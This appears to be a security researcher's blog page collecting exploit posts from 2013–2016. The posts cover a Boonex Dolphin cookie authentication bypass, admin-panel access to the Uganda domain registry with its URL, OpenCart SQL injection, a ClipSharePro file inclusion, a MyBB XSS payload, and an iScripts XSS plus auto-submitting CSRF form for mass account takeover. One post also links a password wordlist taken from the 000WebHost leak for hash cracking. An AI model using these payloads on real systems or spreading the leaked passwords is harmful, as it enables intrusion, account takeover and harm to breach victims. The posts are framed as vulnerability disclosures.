Boonex Dolphin all versoin <= 7.3 Authentication Bypass

Posted by Saadi On Wednesday 26 October 2016 3 comments
# Exploit Title     : Boonex Dolphin all versoin <= 7.3 Authentication Bypass
# Exploit Author    : Saadat Ullah saadi_linux[@]rocketmail.com
# Software Link     : https://www.boonex.com
# Author HomePage   : http://security-geeks.blogspot.com
  
 
Proof of Concept
 
File: admin.inc.php
Line: 187
Code: (strcmp($aProfile['Password'], $passwd) != 0)
  
$passwd is equal to Cookie parameter memberpassword
  
Bug:
According to PHP documentation strcmp will compare strings, but what if we provide an array???
  
So, simple bypass is to put two cookies in browser
memberID=1
memberPassword[]=blah --->array
  
This will allow the attacker to bypass the authentication and can also enter in admin panel.
  
#Independent Pakistani Security Researcher
READ MORE

Hack Diaries - Pwning TLD Uganda

Posted by Saadi On Friday 8 July 2016 1 comments
Hi, after a long time... today I am going to show you POC for pwning TLD .ug which I did some 3-4 years back.
Years back the interface of the domain was http://old.registry.co.ug/ and "Domain Manager Panel" sub-domain was not exposed in the TLD main domain and search engines.
So, after doing some information gathering e.g. port scanning, whois lookup's etc I found the Domain panel which was located at https://new.registry.co.ug:8006/

I am not going in detailed explanation of how I do the pentest rather show you the main weakness "Direct object reference".
So, after trying hard for RCE, SQLi, server vulnerabilities enumeration etc. I found a direct object reference to the admin panel.
To enter in the domain manager as admin you just have to locate below URL:
https://new.registry.co.ug:8006/admin

 

There was no validation of users via sessions or any other mechanism. And I was able to see all the stuff in admin panel including changing DNS of any domain such as google, MSN etc.
At that time I tried to contact them but I didn’t get any response and later in 2013 and 2015 someone hacked and changed the DNS of some domains like google.co.ug, MSN etc. When I came to know the defacement I recheck for the vulnerability but this time it was patch by them (after the defacement). But still it is vuln to direct object reference in many other places.


Will come up with some more cool Hack Diaries - Happy Hacking ;)
READ MORE

000WebHost Leaked Data - Wordlist

Posted by Saadi On Tuesday 1 December 2015 0 comments
Hi, I have just extracted passwords from leaked 000WebHost data and made a wordlist for hash cracking :).

You can find it here

https://drive.google.com/open?id=0B_ysNAZFtakdRlg5N0pvV01jSGs
READ MORE

OpenCart <= 1.5.6.1 SQL Injection

Posted by Saadi On Wednesday 26 March 2014 11 comments

Hi , so today we have SQL injection in OpenCart .
I discovered this bug several months ago when i pentested OpenCart and found CSRF in it too.You can check CSRF here.
The ebay.php file in OpenCart is badly coded and you can see a lot SQLi in it.
So here it is..

http://www.exploit-db.com/exploits/32520
http://packetstormsecurity.com/files/125867/OpenCart-1.5.6.1-SQL-Injection.html
http://cxsecurity.com/issue/WLB-2014030212
http://1337day.com/exploit/description/22071


# Exploit Title     : OpenCart <= 1.5.6.1 SQL Injection
# Date              : 2014/3/26
# Exploit Author    : Saadat Ullah , saadi_linux@rocketmail.com
# Software Link     : http://www.opencart.com/index.php?route=download/download
                    : https://github.com/opencart
# Software web      : www.opencart.com
# Author HomePage   : http://security-geeks.blogspot.com/
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Opencart suffers from multipe SQL injection in ebay.php the bug is more about 
privilege escalation as attacker may need openbay module access .

Poc
Poorly coded file full of SQLi opencart/system/library/ebay.php
In file opencart/system/library/ebay.php
product_id is used in a SQL query without being sanitize.

public function getEbayItemId($product_id) {
$this->log('getEbayItemId() - Product ID: '.$product_id);

$qry = $this->db->query("SELECT `ebay_item_id` FROM `" . DB_PREFIX . "ebay_listing` WHERE `product_id` = '".$product_id."' AND `status` = '1' LIMIT 1");
..............
Function is called on many locations and paramter is passed without santize.
In opencart\admin\controller\openbay\openbay.php
public function editLoad() {
...
$item_id        = $this->openbay->ebay->getEbayItemId($this->request->get['product_id']);
..............
Where $this->request->get['product_id'] comming from GET field.
Similarly More

public function isEbayOrder($id) {
...
$qry = $this->db->query("SELECT `comment` FROM `" . DB_PREFIX . "order_history` WHERE `comment` LIKE '[eBay Import:%]' AND `order_id` = '".$id."' LIMIT 1");

In opencart\admin\controller\extension\openbay.php
public function ajaxOrderInfo()
...
if($this->openbay->ebay->isEbayOrder($this->request->get['order_id']) !== false){
..............
More
public function getProductStockLevel($productId, $sku = '') {
...
$qry = $this->db->query("SELECT `quantity`, `status` FROM `" . DB_PREFIX . "product` WHERE `product_id` = '".$productId."' LIMIT 1");
..............
ebay.php has many more..
User should have openbay module access
http://localhost/opencart/admin/index.php?route=openbay/openbay/editLoad&token=5750af85a1d913aded2f6e2128616cb3&product_id=1'

#Independent Pakistani Security Researcher


READ MORE

ClipSharePro <= 4.1 Local File Inclusion

Posted by Saadi On Saturday 8 March 2014 1 comments
http://www.exploit-db.com/exploits/32131

http://cxsecurity.com/issue/WLB-2014030063


# Exploit Title  : ClipSharePro <= 4.1 Local File Inclusion
# Date           : 2013/3/9
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.clip-share.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

#Local File Inclusion

ClipsharePro is a paid youtube clone script , suffers from Localfile Inclusion vulnerability through
which attacker can include arbitrary file in webapp.

LFI in ubr_link_upload.php
Poc code

if($MULTI_CONFIGS_ENABLED){
if(isset($_GET['config_file']) && strlen($_GET['config_file']) > 0){ $config_file = $_GET['config_file']; }
else{ showAlertMessage("<font color='red'>ERROR</font>: Failed to find config_file parameter", 1); }
}
else{ $config_file = $DEFAULT_CONFIG; }
// Load config file
require $config_file;  //including arbitrary file $_GET['config_file']
echo $config_file;
READ MORE

Mybb 1.6.12 XSS P0c

Posted by Saadi On Friday 14 February 2014 2 comments
Hi , i didn't update the blog for some time as i was busy with some other stuff but now onward some cool stuff coming soon which i found but didn't publish them..

Mybb XSS ,  some days back i found a advisory XSS in search.php
Reference : http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day/

After reading the article and little reviewing the code i found same types of function were coded for searching private messages.

So i fuzz the same inputs strings which was used by author in search.php and got private.php also vuln to XSS.

function privatemessage_perform_search_mysql
----in /inc/function_search.php
called in private.php

private.php
POST paramter keywords
Data:<script>alert(/Saadi/)</script>qor'("\2a</script>

P0c


Moreover Mybb 1.8 alpha is also vuln on private.php..
So this is for today ;)

#Independent Pakistani Security Researcher
READ MORE

iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover

Posted by Saadi On Saturday 14 December 2013 1 comments
# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah , saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which
attacker can manipulate user data via sending him malicious craft url.

XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());

$_POST['txtReview'] is inserted without sanitizing.

Exploitation

Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.

XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.

# Cross-site request forgery
<html>
<body onload="javascript:document.forms[0].submit()">
<form  name="ex"action="http://localhost/profile.php" method=post >
                        <input type=hidden size=30 maxlength=30 name=userid value="5">
        <input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
        <input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
        <input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
                        <input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
               <input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
       <input type=submit   name=btnSaveChanges class=button value='Save'>
</form>
</html>

#     XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change mass user email ,  after changing the email we can change the password too via forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit

So now whenever user browse different products their useremail will be changed automatically.

#Independent Pakistani Security Researcher
READ MORE